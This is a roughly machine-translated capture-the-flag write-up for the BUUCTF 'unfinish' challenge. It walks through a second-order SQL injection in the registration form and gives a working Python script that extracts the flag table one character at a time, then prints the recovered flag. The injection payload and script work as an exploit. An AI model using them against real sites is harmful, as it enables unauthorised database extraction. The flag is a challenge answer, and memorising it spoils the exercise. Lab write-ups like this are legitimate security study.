Record buuctf [netding Cup 2018] unfinish1 problem solving ideas

1, Enter the topic :
        

2, Find out Url Medium login.php, Just type in to log in , The discovery page will only output the wrong user name and password , It should be a sql Inject the topic , Take a blind guess at the registration page , Possible register.php, It does exist register.php, And you can register , It should be secondary injection , Try it . Find input ,information, There will be nonono！！！, Input %23,#,-- When the page appears, it does not automatically jump to login.php, That is, the registration failed . No, information It means that the table cannot be displayed ..., Really not , Looked at the WP, Used '0'+ascii The output shows , And guess blindly flag surface .

Try it on your own

It works  

Write your own script :

import requests
import re
from time import sleep
from bs4 import BeautifulSoup


def flag():
    flag = ''
    url = 'http://2e0a2363-377a-46a6-9183-370acb55ef7c.node4.buuoj.cn:81/'
    url1 = url + 'register.php'
    url2 = url + 'login.php'
    for i in range(1, 100):
        sleep(0.5)
        data1 = {"email": f"aiwin{i}@163.com",
                 "username": f"0'+ascii(substr((select * from flag) from {i} for 1))+'0;", "password": "1"}
        data2 = {"email": f"aiwin{i}@163.com", "password": "1"}
        response_regiseter = requests.post(url1, data=data1)
        response_login = requests.post(url2, data=data2)
        bs = BeautifulSoup(response_login.text, 'html.parser')  # bs4 Parsing the page 
        username = bs.find('span', class_='user-name')  #  Get the return page data span class=user-name attribute 
        number = username.text  #  Take the number of this attribute 
        flag += chr(int(number))
        print(flag)


if __name__ == '__main__':
    flag()

Operation solution flag

flag{8fcf2419-d63f-45f3-90da-e2b33985d489}